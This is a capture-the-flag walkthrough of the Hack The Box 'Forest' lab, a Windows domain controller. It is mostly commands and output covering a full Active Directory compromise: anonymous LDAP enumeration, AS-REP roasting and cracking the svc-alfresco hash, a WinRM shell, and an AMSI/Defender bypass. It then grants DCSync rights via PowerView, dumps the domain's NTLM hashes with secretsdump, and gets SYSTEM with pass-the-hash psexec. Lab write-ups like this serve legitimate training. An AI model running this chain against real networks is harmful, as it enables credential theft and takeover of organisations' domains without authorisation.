Forest

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Enumeration

Nmap

To begin our enumeration, we run an Nmap scan to gather information about the target services.

nmap -sC -sV -Pn -v 10.129.222.56

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-29 05:19:23Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-10-28T22:19:33-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m31s, median: 6m48s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-10-29T05:19:34
|_  start_date: 2024-10-29T05:17:33

Since we might have missed some ports, we run an all-ports scan to be thorough.

nmap -sC -sV -Pn -v 10.129.222.56 -p- -T4 --min-rate=1000

This reveals some additional open ports:

PORT      STATE    SERVICE        VERSION
53/tcp    open     domain         Simple DNS Plus
88/tcp    open     kerberos-sec   Microsoft Windows Kerberos (server time: 2024-10-29 07:44:41Z)
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
389/tcp   open     ldap           Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds   Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http     Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1396/tcp  filtered dvl-activemail
3268/tcp  open     ldap           Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6580/tcp  filtered parsec-master
9389/tcp  open     mc-nmf         .NET Message Framing
11530/tcp filtered unknown
12879/tcp filtered unknown
19164/tcp filtered unknown
23941/tcp filtered unknown
24913/tcp filtered unknown
25819/tcp filtered unknown
26242/tcp filtered unknown
27992/tcp filtered unknown
33191/tcp filtered unknown
35610/tcp filtered unknown
39952/tcp filtered unknown
47001/tcp open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
48384/tcp filtered unknown
49664/tcp open     msrpc          Microsoft Windows RPC
49665/tcp open     msrpc          Microsoft Windows RPC
49666/tcp open     msrpc          Microsoft Windows RPC
49669/tcp open     msrpc          Microsoft Windows RPC
49671/tcp open     msrpc          Microsoft Windows RPC
49676/tcp open     ncacn_http     Microsoft Windows RPC over HTTP 1.0
49677/tcp open     msrpc          Microsoft Windows RPC
49681/tcp open     msrpc          Microsoft Windows RPC
49698/tcp open     msrpc          Microsoft Windows RPC
53033/tcp filtered unknown
53953/tcp filtered unknown
54660/tcp open     msrpc          Microsoft Windows RPC
59223/tcp filtered unknown

The machine appears to be a Domain Controller for the htb.local domain. For which domain is this machine a Domain Controller?

htb.local

LDAP

Next, we check if the LDAP service allows anonymous binds using the ldapsearch tool.

ldapsearch -x -H ldap://10.129.222.56 -D '' -w '' -b "DC=htb,DC=local"

The output confirms that anonymous binding is allowed, giving us some valuable information about the domain structure.

# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20241029051723.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
...

Which of the following services allows for anonymous authentication and can provide us with valuable information about the machine?

LDAP

To further enumerate the domain, we use the windapsearch tool, which is useful for querying LDAP information in Active Directory.

git clone https://github.com/ropnop/windapsearch.git
pip install python-ldap
./windapsearch.py -d htb.local --dc-ip 10.129.222.56 -U

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.222.56
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None

[+] Enumerating all AD users
[+]     Found 28 users: 

cn: Guest

cn: DefaultAccount

...

cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local

cn: Sebastien Caron
userPrincipalName: sebastien@htb.local

cn: Lucinda Berger
userPrincipalName: lucinda@htb.local

cn: Andy Hislip
userPrincipalName: andy@htb.local

cn: Mark Brandt
userPrincipalName: mark@htb.local

cn: Santi Rodriguez
userPrincipalName: santi@htb.local
...

[*] Bye!

The -U flag is used to enumerate all users, i.e. objects with objectCategory set to user . We find some username and mailbox accounts, which means that exchange is installed in the domain. Let's enumerate all other objects in the domain using the objectClass=* filter.

./windapsearch.py -d htb.local --dc-ip 10.129.222.56 --custom "objectClass=*"

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.222.56
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Performing custom lookup with filter: "objectClass=*"
[+]     Found 312 results:

...
OU=Service Accounts,DC=htb,DC=local

CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

OU=Security Groups,DC=htb,DC=local
...

The query reveals 312 unique objects, including the svc-alfresco service account. Upon researching Alfresco online, we find that the service requires Kerberos pre-authentication to be disabled. This allows us to request an encrypted Ticket Granting Ticket (TGT) for this user. Since the TGT is encrypted with the user's NTLM hash, we can perform an offline brute-force attack to try and obtain the password for svc-alfresco.

Foothold

We use GetNPUsers.py from the Impacket suite to request the TGT for the svc-alfresco account:

impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.129.222.56 -no-pass

The output includes a hash:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for svc-alfresco
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a193435bdcba770cb6a357b1758775f5$8d9f4e3e039285cda75cff5dcd9be35318a1c63211f305bb162bc72e1935950ed39a520b1368b94e7c3a9593c695ec76e7064aaa133989faf28a52914baf2cd7385e0b55da13365cf7b81803d67fa61e40b80d8e94d92cd138be70944286d18a65f20f03f12f62e5af27e2c6bc630b5db292f962b62a89f5c80623fd858e4c15a0e088449a37355ceb7aa28ab6d6ccc4dcf0f06591564645cf0445b1e9af50e94aab72c5b54f8227623912fcf6fe8147cea507f3480186af58a905dfaf351d1cbdfc418ef70e05d16f56214063b09cc4211cc40687373f5cd07a9f8b2618abce45e456a4d41e

We use Hashcat to crack the AS-REP hash with mode 18200:

└─$ hashcat --help | grep -i "Kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt

$krb5asrep$23$svc-alfresco@HTB.LOCAL:a193435bdcba770cb6a357b1758775f5$8d9f4e3e039285cda75cff5dcd9be35318a1c63211f305bb162bc72e1935950ed39a520b1368b94e7c3a9593c695ec76e7064aaa133989faf28a52914baf2cd7385e0b55da13365cf7b81803d67fa61e40b80d8e94d92cd138be70944286d18a65f20f03f12f62e5af27e2c6bc630b5db292f962b62a89f5c80623fd858e4c15a0e088449a37355ceb7aa28ab6d6ccc4dcf0f06591564645cf0445b1e9af50e94aab72c5b54f8227623912fcf6fe8147cea507f3480186af58a905dfaf351d1cbdfc418ef70e05d16f56214063b09cc4211cc40687373f5cd07a9f8b2618abce45e456a4d41e:s3rvice
                                                          
Session..........: hashcat
Status...........: Cracked
...

After successfully cracking the hash, we find the password for svc-alfresco is s3rvice.

Verify if we can login over winrm (optional)

└─$ nxc winrm 10.129.222.56                                               
WINRM       10.129.222.56   5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)

With port 5985 open, we attempt to log in via WinRM using evil-winrm:

evil-winrm -i 10.129.222.56 -u svc-alfresco -p s3rvice

We successfully gain an interactive shell and retrieve the user flag.

Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/28/2024  10:18 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
840ae1ef2df79bf36733a3266272a119

Which user has Kerberos Pre-Authentication disabled?

svc-alfresco

What is the password of the user svc-alfresco?

s3rvice

To what port can we connect with these creds to get an interactive shell?

5985

Privilege Escalation

To escalate privileges, we use BloodHound to enumerate possible paths to higher privileges. First, we upload and execute SharpHound to collect data for BloodHound:

https://github.com/BloodHoundAD/BloodHound/releases

https://github.com/BloodHoundAD/SharpHound/releases I used older version of SharpHound.exe and it was already made available in my local Tools folder.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
                                        
Info: Uploading /home/kali/Tools/SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe
                                        
Data: 1402880 bytes of 1402880 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe
2024-10-29T00:59:44.2900966-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-10-29T00:59:44.4778281-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-29T00:59:44.5090391-07:00|INFORMATION|Initializing SharpHound at 12:59 AM on 10/29/2024
2024-10-29T00:59:44.7900992-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-10-29T00:59:44.8213506-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-29T00:59:45.2589123-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-10-29T00:59:45.4307416-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-29T00:59:45.4307416-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-29T01:00:16.0714815-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2024-10-29T01:00:29.8995766-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-29T01:00:29.9777004-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-29T01:00:30.1495755-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 46 MB RAM
2024-10-29T01:00:30.1495755-07:00|INFORMATION|Enumeration finished in 00:00:44.8989341
2024-10-29T01:00:30.2589592-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
 117 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-29T01:00:30.2906329-07:00|INFORMATION|SharpHound Enumeration Completed at 1:00 AM on 10/29/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/29/2024   1:00 AM          18885 20241029010029_BloodHound.zip
-a----       10/29/2024   1:00 AM          19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----       10/29/2024  12:59 AM        1052160 SharpHound.exe
-a----       10/29/2024  12:56 AM        1308348 SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20241029010029_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20241029010029_BloodHound.zip to 20241029010029_BloodHound.zip
                                        
Info: Download successful!

Start neo4j

└─$ sudo neo4j start   
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:142804). It is available at http://localhost:7474
There may be a short delay until the server is ready.

After running BloodHound and uploading the collected data, we search for the svc-alfresco user and mark it as owned. Double-clicking the node displays its properties on the right. We discover that svc-alfresco is a member of nine groups through nested memberships. Clicking on the number 9 reveals the detailed membership graph.

One of the nested groups is Account Operators, which is a privileged AD group. According to the documentation, members of the Account Operators group can create and modify users and add them to non-protected groups. We take note of this and then explore potential paths to Domain Admins by selecting the Shortest Path to High Value Targets query.

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#account-operators

One of the identified paths shows that the Exchange Windows Permissions group has WriteDACL privileges on the domain. This permission allows a user to modify ACLs on an object, which means we can add a user to this group and grant them DCSync privileges.

Which group has WriteDACL permissions over the HTB.LOCAL domain?

Exchange Windows Permissions

The user svc-alfresco is a member of a group that allows them to add themself to the "Exchange Windows Permissions" group. Which group is that?

Account Operators

Which of the following attacks can you perform to elevate your privileges with a user that has WriteDACL on the domain?

DCSync

With the WriteDACL permission, we add a new user (joe) to the Exchange Windows Permissions group and grant it DCSync rights.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user joe P@ssw0rd123 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" joe /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" joe /add
The command completed successfully.

The Bypass-4MSI command is used to bypass Windows Defender before importing the script. We then use Add-ObjectACL with joe's credentials to assign DCSync rights to the user.

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu


   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary 
[+] Invoke-BloodHound
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
                                        
Info: Patching 4MSI, please be patient...
                                        
[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/kali/Tools/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> powershell -ep bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 'P@ssw0rd123' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = new-object system.management.automation.pscredential('htb\joe', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity joe -Credential $cred -Rights DCSync

Finally, we use secretsdump.py from Impacket to dump the domain hashes:

└─$ impacket-secretsdump htb/joe@10.129.222.56                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
...

We obtain the NTLM hash for the Administrator account, which we use to gain an administrative shell via psexec:

└─$ impacket-psexec -hashes 00000000000000000000000000000000:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.129.222.56
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.222.56.....
[*] Found writable share ADMIN$
[*] Uploading file wSsodTYp.exe
[*] Opening SVCManager on 10.129.222.56.....
[*] Creating service nogH on 10.129.222.56.....
[*] Starting service nogH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 61F2-A88F

 Directory of C:\Users\Administrator\Desktop

09/23/2019  02:15 PM    <DIR>          .
09/23/2019  02:15 PM    <DIR>          ..
10/28/2024  10:18 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  10,437,902,336 bytes free

C:\Users\Administrator\Desktop> type root.txt
fb5b47930b35028c65bae2c6c8e22ec3

C:\Users\Administrator\Desktop> ipconfig /all
 
Windows IP Configuration

   Host Name . . . . . . . . . . . . : FOREST
   Primary Dns Suffix  . . . . . . . : htb.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : htb.local
                                       htb

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-37-14
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::be(Preferred) 
   Lease Obtained. . . . . . . . . . : Monday, October 28, 2024 10:17:26 PM
   Lease Expires . . . . . . . . . . : Tuesday, October 29, 2024 2:17:26 AM
   IPv6 Address. . . . . . . . . . . : dead:beef::ccb2:9ff9:585d:b629(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::ccb2:9ff9:585d:b629%5(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.129.222.56(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Monday, October 28, 2024 10:17:38 PM
   Lease Expires . . . . . . . . . . : Tuesday, October 29, 2024 2:17:38 AM
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%5
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DHCPv6 IAID . . . . . . . . . . . : 50352214
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2E-B2-28-3C-00-50-56-B9-37-14
   DNS Servers . . . . . . . . . . . : 127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
   Connection-specific DNS Suffix Search List :
                                       htb

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

We successfully retrieve the root flag.

References

HTB Forest Official Walkthrough